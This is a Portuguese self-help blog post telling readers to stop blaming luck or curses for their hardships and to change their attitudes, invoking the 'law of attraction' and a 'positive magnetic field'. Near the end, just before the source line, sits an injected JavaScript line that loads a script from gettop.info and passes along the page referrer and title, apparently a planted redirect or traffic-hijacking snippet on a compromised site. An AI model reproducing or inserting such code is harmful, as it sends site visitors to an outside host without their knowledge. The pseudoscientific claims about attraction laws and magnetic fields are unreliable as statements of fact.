Abra seus caminhos

Você está atravessando ou atravessou momentos difíceis? Pensou em azar, “olho gordo” de alguém ou macumba? Parou pra pensar, em algum momento, nos seus pensamentos, palavras e ações atuais ou passadas? Se tivesse refletido sobre você mesmo, poderia ter achado as causas dos seus problemas.

“O homem é o lobo do próprio homem”. Seus lobos são suas atitudes nocivas, pensamentos de derrota e maldade, e suas conversas negativas. Ao agir assim você fica dentro do alcance das leis de atração que agirão imediatamente ou no futuro para lhe educar.

 Momentos difíceis são mensagens para que você acorde e aja. Nesses momentos você trata mal os amigos? A família? Aumenta a desonestidade? A bebida? Então, perderá os amigos, a família, a liberdade e a saúde. Fechará mais ainda seus caminhos.

Não caia na tentação do fácil, nas oportunidades criminosas oferecidas por falsos amigos. Aceitando-as, cairá num ciclo do qual, talvez, não conseguirá mais sair.

Crise é desafio para você ousar, mudar, melhorar, progredir! É momento de pensar no bem do outro e não só no seu. “Faça ao outro aquilo que gostaria de receber”, ensinou Jesus.

Não entre na onda de acreditar em azar ou ser vítima do destino. Não existe azar. Existem leis de atração que agem sobre todos.

É claro que existem pessoas que desde cedo atravessam uma vida com muitas dificuldades. Mas, mesmo para estas, a mensagem é a mesma: Mude pra melhor o que pode ser mudado, e aceite com disposição o que não pode ser mudado, sem se vitimizar e sem cair no coitadismo.

Se já está no caminho do bem, continue. E acredite que as leis de atração, em algum momento, entrarão em ação lhe beneficiando. Se você confiar, notará que pessoas importantes apareceram na sua vida para lhe beneficiar. Seja grato. Seja solidário.

Viva com disposição, e o seu campo magnético positivo abrirá seus caminhos num processo irreversível. “Sorte não existe. Sorte é quando preparação encontra a oportunidade. Você encontra na vida pessoas, lugares e situações necessários à sua evolução”.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Fonte:

Deixe um comentário